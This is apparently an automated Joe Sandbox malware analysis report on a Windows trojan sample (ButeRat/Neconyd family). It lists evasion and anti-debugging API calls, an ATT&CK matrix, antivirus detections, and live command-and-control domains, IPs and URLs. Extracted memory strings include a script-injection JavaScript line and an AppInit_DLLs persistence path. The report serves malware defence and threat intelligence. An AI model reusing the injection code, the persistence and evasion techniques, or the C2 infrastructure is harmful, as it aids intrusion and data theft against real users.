          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-5845
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-5716
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeAPI coverage: 8.6 %
          Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 6776Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 404Thread sleep time: -80000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 2088Thread sleep time: -150000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 2088Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040ABD9 FindFirstFileW,FindClose,0_2_0040ABD9
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00408248
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_0040ABD9 FindFirstFileW,FindClose,2_2_0040ABD9
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,2_2_00408248
          Source: C:\Windows\SysWOW64\omsecor.exeThread delayed: delay time: 60000Jump to behavior
          Source: omsecor.exe, 00000001.00000002.1883482540.0000000000682000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWgRJJ
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeAPI call chain: ExitProcess graph end nodegraph_0-5874
          Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_2-5874
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CD66
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_004075D4 GetLastError,CreateFileW,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,RtlAllocateHeap,ReadFile,ReadFile,WriteFile,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,WriteFile,CloseHandle,CloseHandle,CloseHandle,0_2_004075D4
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CD66
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004032B8
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CD66
          Source: bd0wJGTae5.exe, omsecor.exeBinary or memory string: Shell_TrayWnd
          Source: bd0wJGTae5.exe, omsecor.exe.1.dr, omsecor.exe.0.drBinary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_time*CsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: */*
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040CB03 cpuid 0_2_0040CB03
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_00407267 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv,0_2_00407267
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00407499
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_00406CB5 GetVersionExW,0_2_00406CB5
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          2
          Process Injection
          121
          Masquerading
          OS Credential Dumping2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts21
          Native API
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          11
          Virtualization/Sandbox Evasion
          LSASS Memory21
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
          Process Injection
          Security Account Manager1
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information
          NTDS11
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials13
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          bd0wJGTae5.exe87%ReversingLabsWin32.Trojan.ButeRat
          bd0wJGTae5.exe100%AviraTR/SpyVoltar.absza
          bd0wJGTae5.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Windows\SysWOW64\omsecor.exe100%AviraTR/SpyVoltar.absza
          C:\Users\user\AppData\Roaming\omsecor.exe100%AviraTR/SpyVoltar.absza
          C:\Windows\SysWOW64\omsecor.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\omsecor.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          lousta.net
          193.166.255.171
          truetrue
            unknown
            mkkuei4kdsz.com
            15.197.204.56
            truetrue
              unknown
              ow5dirasuek.com
              52.34.198.229
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://mkkuei4kdsz.com/true
                  unknown
                  http://lousta.net/956/959.htmltrue
                    unknown
                    http://lousta.net/508/485.htmltrue
                      unknown
                      http://lousta.net/562/252.htmltrue
                        unknown
                        http://mkkuei4kdsz.com/516/243.htmltrue
                          unknown
                          http://ow5dirasuek.com/776/947.htmltrue
                            unknown
                            ht:/r.irsf.o/true
                              unknown
                              http://ow5dirasuek.com/537/167.htmltrue
                                unknown
                                http://mkkuei4kdsz.com/353/421.htmltrue
                                  unknown
                                  http://mkkuei4kdsz.com/978/939.htmltrue
                                    unknown
                                    http://ow5dirasuek.com/292/164.htmltrue
                                      unknown
                                      http://lousta.net/740/238.htmltrue
                                        unknown
                                        http://lousta.net/333/645.htmltrue
                                          unknown
                                          http://mkkuei4kdsz.com/781/119.htmltrue
                                            unknown
                                            http://lousta.net/734/112.htmltrue
                                              unknown
                                              http://mkkuei4kdsz.com/488/933.htmltrue
                                                unknown
                                                ht:/w.irsf.o/true
                                                  unknown
                                                  http://lousta.net/875/87.htmltrue
                                                    unknown
                                                    http://ow5dirasuek.com/546/102.htmltrue
                                                      unknown
                                                      http://lousta.net/547/467.htmltrue
                                                        unknown
                                                        http://lousta.net/78/665.htmltrue
                                                          unknown
                                                          http://lousta.net/263/482.htmltrue
                                                            unknown
                                                            http://ow5dirasuek.com/434/722.htmltrue
                                                              unknown
                                                              http://lousta.net/908/776.htmltrue
                                                                unknown
                                                                http://lousta.net/true
                                                                  unknown
                                                                  http://lousta.net/528/262.htmltrue
                                                                    unknown
                                                                    http://mkkuei4kdsz.com/785/70.htmltrue
                                                                      unknown
                                                                      http://ow5dirasuek.com/945/466.htmltrue
                                                                        unknown
                                                                        http://lousta.net/497/157.htmltrue
                                                                          unknown
                                                                          http://mkkuei4kdsz.com/457/998.htmltrue
                                                                            unknown
                                                                            http://ow5dirasuek.com/true
                                                                              unknown
                                                                              http://ow5dirasuek.com/763/794.htmltrue
                                                                                unknown
                                                                                http://lousta.net/527/338.htmltrue
                                                                                  unknown
                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                  http://ow5dirasuek.com/763/794.htmlZZomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://mkkuei4kdsz.com/781/119.htmlfomsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://lousta.net/562/252.htmlYomsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://ow5dirasuek.com/546/102.html$omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://mkkuei4kdsz.com/516/243.html0omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://ow5dirasuek.com/776/947.htmlnZomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://mkkuei4kdsz.com/516/243.html&omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://ow5dirasuek.com/776/947.htmlrZC-omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://ow5dirasuek.com/537/167.htmlwmomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://lousta.net/562/252.htmlfomsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://ow5dirasuek.com/546/102.html;Lomsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://lousta.net/78/665.htmlHomsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://ow5dirasuek.com/292/164.html.Eomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://mkkuei4kdsz.com/488/933.htmldZI-&omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://ow5dirasuek.com/546/102.htmlDomsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://lousta.net/956/959.html0473447omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://lousta.net/908/776.htmla0omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://ow5dirasuek.com/537/167.html;Qomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://lousta.net/956/959.htmlwomsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://lousta.net/263/482.html3omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://mkkuei4kdsz.com/781/119.html)omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://lousta.net/740/238.htmlxomsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://ow5dirasuek.com/945/466.htmlAomsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://mkkuei4kdsz.com/781/119.html4omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://ow5dirasuek.com/945/466.htmlNomsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://lousta.net/528/262.html9Tk-.omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://mkkuei4kdsz.com/457/998.html-559bf06f72796be679omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://ow5dirasuek.com/546/102.htmlfomsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://mkkuei4kdsz.com/353/421.html$Eomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://lousta.net/497/157.htmlBomsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://ow5dirasuek.com/546/102.html#Lomsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://ow5dirasuek.com/546/102.htmlULVomsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://mkkuei4kdsz.com/488/933.htmlasuek.comomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://ow5dirasuek.com/945/466.htmlasuek.comomsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://lousta.net/562/252.html.omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconbd0wJGTae5.exe, omsecor.exe.1.dr, omsecor.exe.0.drfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://lousta.net/562/252.htmlabaomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://ow5dirasuek.com/en-GBomsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://ow5dirasuek.com/763/794.html6Zomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://ow5dirasuek.com/546/102.html5Lomsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://mkkuei4kdsz.com/488/933.htmlomomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://mkkuei4kdsz.com/516/243.htmlwLtomsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://ow5dirasuek.com/945/466.html3omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://mkkuei4kdsz.com/457/998.html~omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://mkkuei4kdsz.com/8.htmlshqos.dll.muiomsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://lousta.net/547/467.html4Wxomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://ow5dirasuek.com/945/466.html/omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://lousta.net/908/776.htmlFTv-1omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://ow5dirasuek.com/pomsecor.exe, 00000006.00000002.3024294943.0000000000195000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://lousta.neomsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://ow5dirasuek.com/776/947.htmlPZomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://lousta.net/562/252.htmlBomsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://ow5dirasuek.com/292/164.htmlamomsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://ow5dirasuek.com/945/466.html7omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://lousta.net/734/112.htmlkomsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                193.166.255.171
                                                                                                                                                                                                lousta.netFinland
                                                                                                                                                                                                1741FUNETASFItrue
                                                                                                                                                                                                52.34.198.229
                                                                                                                                                                                                ow5dirasuek.comUnited States
                                                                                                                                                                                                16509AMAZON-02UStrue
                                                                                                                                                                                                15.197.204.56
                                                                                                                                                                                                mkkuei4kdsz.comUnited States
                                                                                                                                                                                                7430TANDEMUStrue
                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                Analysis ID:1546805
                                                                                                                                                                                                Start date and time:2024-11-01 16:02:54 +01:00
                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                Overall analysis duration:0h 4m 55s
                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                Number of analysed new started processes analysed:8
                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                Sample name:bd0wJGTae5.exe
                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                Original Sample Name:497678a9f8adc08d092b720d45797ad245e3d9d7.exe
                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                Classification:mal100.bank.troj.evad.winEXE@7/3@3/3
                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                • Number of executed functions: 23
                                                                                                                                                                                                • Number of non-executed functions: 116
                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                • VT rate limit hit for: bd0wJGTae5.exe
                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                11:03:55API Interceptor31x Sleep call for process: omsecor.exe modified
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                193.166.255.171HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • lousta.net/989/145.html
                                                                                                                                                                                                Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                                                                                                                                                                                                Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                                                                                                                                                                                                document.log.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                                                                                                                                                                                                yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                • www.synetik.net/
                                                                                                                                                                                                cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • lousta.net/161/343.html
                                                                                                                                                                                                Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • lousta.net/372/625.html
                                                                                                                                                                                                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • lousta.net/766/881.html
                                                                                                                                                                                                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • lousta.net/240/311.html
                                                                                                                                                                                                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • lousta.net/461/572.html
                                                                                                                                                                                                52.34.198.229HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • ow5dirasuek.com/145/281.html
                                                                                                                                                                                                OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                • lygyvuj.com/login.php
                                                                                                                                                                                                5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                • lygyvuj.com/login.php
                                                                                                                                                                                                cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • ow5dirasuek.com/968/405.html
                                                                                                                                                                                                Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • ow5dirasuek.com/944/938.html
                                                                                                                                                                                                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • ow5dirasuek.com/643/773.html
                                                                                                                                                                                                RfdNuhaVvG.exeGet hashmaliciousSakula RATBrowse
                                                                                                                                                                                                • www.savmpet.com/photo/bcyybe-1288432018.jpg?resid=5281296
                                                                                                                                                                                                uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                • lygyvuj.com/login.php
                                                                                                                                                                                                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • ow5dirasuek.com/342/85.html
                                                                                                                                                                                                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • ow5dirasuek.com/115/979.html
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                ow5dirasuek.comHUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 52.34.198.229
                                                                                                                                                                                                cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 52.34.198.229
                                                                                                                                                                                                Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 52.34.198.229
                                                                                                                                                                                                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 52.34.198.229
                                                                                                                                                                                                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 52.34.198.229
                                                                                                                                                                                                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 52.34.198.229
                                                                                                                                                                                                djvu452.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 52.34.198.229
                                                                                                                                                                                                gdvfd35.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 52.34.198.229
                                                                                                                                                                                                v48ge.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 52.34.198.229
                                                                                                                                                                                                moviename.exeGet hashmaliciousNeconydBrowse
